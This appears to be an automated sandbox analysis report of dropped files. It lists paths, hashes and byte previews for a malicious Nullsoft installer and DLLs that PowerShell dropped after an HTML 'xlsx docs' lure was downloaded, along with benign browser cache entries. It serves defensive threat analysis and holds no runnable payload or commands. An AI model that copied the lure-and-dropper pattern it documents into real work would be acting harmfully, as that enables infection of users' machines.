        Encrypted:false
        SSDEEP:
        MD5:98CCD44353F7BC5BAD1BC6BA9AE0CD68
        SHA1:76A4E5BF8D298800C886D29F85EE629E7726052D
        SHA-256:E51021F6CB20EFBD2169F2A2DA10CE1ABCA58B4F5F30FBF4BAE931E4ECAAC99B
        SHA-512:D6E8146A1055A59CBA5E2AAF47F6CB184ACDBE28E42EC3DAEBF1961A91CEC5904554D9D433EBF943DD3639C239EF11560FA49F00E1CFF02E11CD8D3506C4125F
        Malicious:true
        Reputation:unknown
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g.}............|.&.....|.$.J...|.%.....H}*.....H}./....H}./.....~P.....H}./.....~D.........z...F}./....F}(.....F}./....Rich............PE..d.....@f.........."....!.b.....................@.....................................'....`.................................................|...........H........4.......(......8...0I..T....................J..(....G..@............................................text....a.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....pdata...4.......6..................@..@_RDATA..\...........................@..@.rsrc...H...........................@..@.reloc..8...........................@..B................................................................................................................................................................................................

        C:\Users\user\AppData\Local\Temp\nstD940.tmp\nsExec.dll

        Download File
        Process:C:\l\Il.exe
        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
        Category:dropped
        Size (bytes):7168
        Entropy (8bit):5.295306975422517
        Encrypted:false
        SSDEEP:
        MD5:11092C1D3FBB449A60695C44F9F3D183
        SHA1:B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
        SHA-256:2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
        SHA-512:C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 0%
        Reputation:unknown
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):0
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:
        MD5:F4054F0842434828F36458A3969F5CAA
        SHA1:28A70C5A57C723E34852AE8477F2441BB6E1365D
        SHA-256:DEC8D6111901EE2E853FF0E7263D4F5DDC528F1DF4F6F6512D861B72ABB640A3
        SHA-512:A467038C269C7B8D373818551ABD658E064E8A4638C862341A3802AD24FD980CB7955101F72296CB35D9A3AB87122F45A9D0171A9E0499997E5DE4A7ABF1AAC5
        Malicious:false
        Reputation:unknown
        Preview:...................................FL..................F.".. ......{4...(i2..L..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4....4p.L... B..L......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H.Y.l..............................A.p.p.D.a.t.a...B.V.1......Y.l..Roaming.@......FW.H.Y.l..............................R.o.a.m.i.n.g.....\.1......Y.l..MICROS~1..D......FW.H.Y.l..........................Oz..M.i.c.r.o.s.o.f.t.....V.1.....GX*w..Windows.@......FW.H.Y.l..............................W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H.Y.l....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y.l..Programs..j......FW.H.Y.l....................@......^..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H.Y.l..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H.Y.l....Q...........

        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AWNREMA0D7PFPNROBNVC.temp

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):6220
        Entropy (8bit):3.71203862783388
        Encrypted:false
        SSDEEP:
        MD5:F4054F0842434828F36458A3969F5CAA
        SHA1:28A70C5A57C723E34852AE8477F2441BB6E1365D
        SHA-256:DEC8D6111901EE2E853FF0E7263D4F5DDC528F1DF4F6F6512D861B72ABB640A3
        SHA-512:A467038C269C7B8D373818551ABD658E064E8A4638C862341A3802AD24FD980CB7955101F72296CB35D9A3AB87122F45A9D0171A9E0499997E5DE4A7ABF1AAC5
        Malicious:false
        Reputation:unknown
        Preview:...................................FL..................F.".. ......{4...(i2..L..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4....4p.L... B..L......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H.Y.l..............................A.p.p.D.a.t.a...B.V.1......Y.l..Roaming.@......FW.H.Y.l..............................R.o.a.m.i.n.g.....\.1......Y.l..MICROS~1..D......FW.H.Y.l..........................Oz..M.i.c.r.o.s.o.f.t.....V.1.....GX*w..Windows.@......FW.H.Y.l..............................W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H.Y.l....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Y.l..Programs..j......FW.H.Y.l....................@......^..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H.Y.l..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H.Y.l....Q...........

        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 12:36:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2673
        Entropy (8bit):3.979801982071149
        Encrypted:false
        SSDEEP:
        MD5:5C6157D1642DC07C8063F6FAA1E5491D
        SHA1:19F49292232B371265DD6E921BB287275652649A
        SHA-256:317049619E20178F92CAFEF401C25A1EADE4267E24D6078CBF9A4F82A481C5A8
        SHA-512:C54A3EC3BA67AB59B6825F5F6F922B6A36E7A2CAE0E540784945B7E0677F9BF5B942905376FC345F40DCBF55F46DE82A8FE76F35AFF48CB2ECF8B5EE639299D4
        Malicious:false
        Reputation:unknown
        Preview:L..................F.@.. ...$+.,....Bd1.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.l....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 12:36:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2675
        Entropy (8bit):3.9965995424281555
        Encrypted:false
        SSDEEP:
        MD5:BDA2AF222C1CFBBD99A5AA7F93D05FF7
        SHA1:7B78296271E6F002DE307741B061506D4456989B
        SHA-256:B1591885980B58835BD9F71E4E24F77AFCC4157311FE927B62E2975F29971788
        SHA-512:0CD94397765294A56176028AE13CFE85E926185CB9E711CE6C896A6E597E128F371716AD0D3DAD7E5369CD06DE38A8C739B9352F6937907A9D5054A799146BD6
        Malicious:false
        Reputation:unknown
        Preview:L..................F.@.. ...$+.,......%.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.l....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2689
        Entropy (8bit):4.005886824367182
        Encrypted:false
        SSDEEP:
        MD5:637F8A5F4BDCD7FC813C87E8CBFB88EF
        SHA1:0844F2ED03E7F23942272B7E1D6942D5664D94D6
        SHA-256:7EB4145AA6AC5B2133CF0578D90F5BBC8552C37EB0644BEFFA66390E668B47F8
        SHA-512:A516636865CDB816FB058127D09C56BDE6265E3A39A5EC4F184EE6DC45B2627E576A5E9D5C3E7EC544572249A4C2524D89E3747B34EF93C377CACC2691E9CD06
        Malicious:false
        Reputation:unknown
        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.l....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 12:36:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2677
        Entropy (8bit):3.9955956661007335
        Encrypted:false
        SSDEEP:
        MD5:9FAA0FF833C13E945279ADCC8760E9DA
        SHA1:52E6A3A9E657A61B3FECED7EE6FC71FCEA1E8887
        SHA-256:16476D67B29EA10944E4659DA163E8151E84AEFE34A8DC70A830AF34DC7DFF11
        SHA-512:516EE194C3365C50D7AD1E2ABF84CBA7ABFBFEF48A78F00B7BC631A187BAFBAA83829EC750EA7A4009368F4A67C88EEAE60953E2098EFFFDF998174E32A4FE7F
        Malicious:false
        Reputation:unknown
        Preview:L..................F.@.. ...$+.,....i...L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.l....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 12:36:44 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2677
        Entropy (8bit):3.981761398566594
        Encrypted:false
        SSDEEP:
        MD5:3411C10E03BF57F39503DA17F7102ECF
        SHA1:8C9C574DF59855410A8CC8F2CC61AC60736908D3
        SHA-256:A4FC5CD63E3BF32FF8BD839C7C36104D4B2710A39654C2929C80D1AC223E7778
        SHA-512:DA3BCE52CD7447F47AB604B009F52A1FE948D72CEA83FC17889E5AE6E6F138F767700BFE9456F9EE80341CC4F5A46D16346B3FF70101BA2E74875C66DB3A042D
        Malicious:false
        Reputation:unknown
        Preview:L..................F.@.. ...$+.,....4"+.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.l....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 12:36:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
        Category:dropped
        Size (bytes):2679
        Entropy (8bit):3.991643212783702
        Encrypted:false
        SSDEEP:
        MD5:CD4D9E4659EC8C5BE8823596F948C4B4
        SHA1:B9243C6BF0D0E362EC4E6F0EE743CD8774A1FB13
        SHA-256:AB88A52C4ED5F020C57D7A2F05B6224183488E988E934675AF83D327E65438C8
        SHA-512:2C8C27A4EC2C7B9DE139CE2975814A848D43EC5518D8CC022EF4B96D3C26967B55F22D61B51FB622BA06A13ED13AB3A2C4731C748CE2CDE8ECE435ECD324E0AC
        Malicious:false
        Reputation:unknown
        Preview:L..................F.@.. ...$+.,....D)..L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y.l....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.l....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.l....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.l..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.l...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..........._........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

        C:\Users\user\Downloads\New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html.html (copy)

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with very long lines (1532), with CRLF, LF line terminators
        Category:dropped
        Size (bytes):0
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:
        MD5:08DB93D511D253F76DB7C3B31C7B636E
        SHA1:D7C9611167E2F1FE18C4F330C0424DBEA080039D
        SHA-256:670AB3178E0574739E2422C42519AB8D171DAAAEE9B481DA0730C236CD3001AF
        SHA-512:886995D51984BD09943EBBD641B6A13E804508FBF2840643E209E75E5CA723F9B9D5CB0F9FBA9FD5757B0B389129588027DECC991F74695DD4E172B6C3CC3E81
        Malicious:false
        Reputation:unknown
        Preview:<!DOCTYPE html>..<html lang="ru">..<head>...<meta charset="UTF-8">...<meta name="viewport" content="width=device-width, initial-scale=1.0">...<title></title>...<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>..</head>..<body>..<div id="content"> reason...In the determination of the cosmological ideas we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides,

        C:\Users\user\Downloads\New xlsx docs074252657723824 - Tuesday, December 3, 2024 at 03_42_05 PM_html.html.crdownload (copy)

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with very long lines (1532), with CRLF, LF line terminators
        Category:dropped
        Size (bytes):0
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:
        MD5:08DB93D511D253F76DB7C3B31C7B636E
        SHA1:D7C9611167E2F1FE18C4F330C0424DBEA080039D
        SHA-256:670AB3178E0574739E2422C42519AB8D171DAAAEE9B481DA0730C236CD3001AF
        SHA-512:886995D51984BD09943EBBD641B6A13E804508FBF2840643E209E75E5CA723F9B9D5CB0F9FBA9FD5757B0B389129588027DECC991F74695DD4E172B6C3CC3E81
        Malicious:false
        Reputation:unknown
        Preview:<!DOCTYPE html>..<html lang="ru">..<head>...<meta charset="UTF-8">...<meta name="viewport" content="width=device-width, initial-scale=1.0">...<title></title>...<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>..</head>..<body>..<div id="content"> reason...In the determination of the cosmological ideas we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides,

        C:\Users\user\Downloads\e445f2a1-0ae4-4323-bfd9-64bebfc47f14.tmp

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with very long lines (1532), with CRLF, LF line terminators
        Category:dropped
        Size (bytes):3176
        Entropy (8bit):4.571373206396365
        Encrypted:false
        SSDEEP:
        MD5:08DB93D511D253F76DB7C3B31C7B636E
        SHA1:D7C9611167E2F1FE18C4F330C0424DBEA080039D
        SHA-256:670AB3178E0574739E2422C42519AB8D171DAAAEE9B481DA0730C236CD3001AF
        SHA-512:886995D51984BD09943EBBD641B6A13E804508FBF2840643E209E75E5CA723F9B9D5CB0F9FBA9FD5757B0B389129588027DECC991F74695DD4E172B6C3CC3E81
        Malicious:false
        Reputation:unknown
        Preview:<!DOCTYPE html>..<html lang="ru">..<head>...<meta charset="UTF-8">...<meta name="viewport" content="width=device-width, initial-scale=1.0">...<title></title>...<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>..</head>..<body>..<div id="content"> reason...In the determination of the cosmological ideas we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides,

        C:\l\Il.exe

        Download File
        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
        Category:dropped
        Size (bytes):43240
        Entropy (8bit):6.536150103211252
        Encrypted:false
        SSDEEP:
        MD5:AB1F884B6E9680A9F25E7517544DDC04
        SHA1:3BDB9E7FD3FC624822FE265210504DA3B0F2E569
        SHA-256:E38F61B017309386869B609735D4A933F08A964135ED2F71FE1FF82C579206D4
        SHA-512:3E1EC8A41A5713A3B7219D4DFDD9541F849960C70540156BDE6F057BDA492A276904E712F73433AF85235662EBAA2A8005DEE64282AFA9AF8E6549D424B00714
        Malicious:true
        Antivirus:
        • Antivirus: ReversingLabs, Detection: 50%
        Reputation:unknown
        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................j..........R5............@.......................................@.............................................P............................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata...0...P...........................rsrc...P...........................@..@................................................................................................................................................................................................................................................................................................................................................

        Chrome Cache Entry: 78

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65447)
        Category:dropped
        Size (bytes):87533
        Entropy (8bit):5.262536918435756
        Encrypted:false
        SSDEEP:
        MD5:2C872DBE60F4BA70FB85356113D8B35E
        SHA1:EE48592D1FFF952FCF06CE0B666ED4785493AFDC
        SHA-256:FC9A93DD241F6B045CBFF0481CF4E1901BECD0E12FB45166A8F17F95823F0B1A
        SHA-512:BF6089ED4698CB8270A8B0C8AD9508FF886A7A842278E98064D5C1790CA3A36D5D69D9F047EF196882554FC104DA2C88EB5395F1EE8CF0F3F6FF8869408350FE
        Malicious:false
        Reputation:unknown
        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove

        Chrome Cache Entry: 79

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (65447)
        Category:downloaded
        Size (bytes):89501
        Entropy (8bit):5.289893677458563
        Encrypted:false
        SSDEEP:
        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
        Malicious:false
        Reputation:unknown
        URL:https://code.jquery.com/jquery-3.6.0.min.js
        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

        Chrome Cache Entry: 80

        Download File
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:Web Open Font Format (Version 2), TrueType, length 118072, version 774.256
        Category:downloaded
        Size (bytes):118072
        Entropy (8bit):7.991739185265016
        Encrypted:true
        SSDEEP:
        MD5:715D593456FA02FE72A008A72398F5BE
        SHA1:E948290773216DC1B50C2121314A8CF918C22B54
        SHA-256:C411F11975D26EB04CD2AA3C071181D4B18E489F1FB97060D4176A3531DFB36E
        SHA-512:1F63209C93A462C2690442C9CF1C3E5A67F2DF7A67DFCDA2CB81292A2DBB90641AA0AB81C25323A1F2D9F0FA09B3421D136AE5228C47E581C51912BA284DE46E
        Malicious:false
        Reputation:unknown
        URL:https://use.fontawesome.com/releases/v6.6.0/webfonts/fa-brands-400.woff2
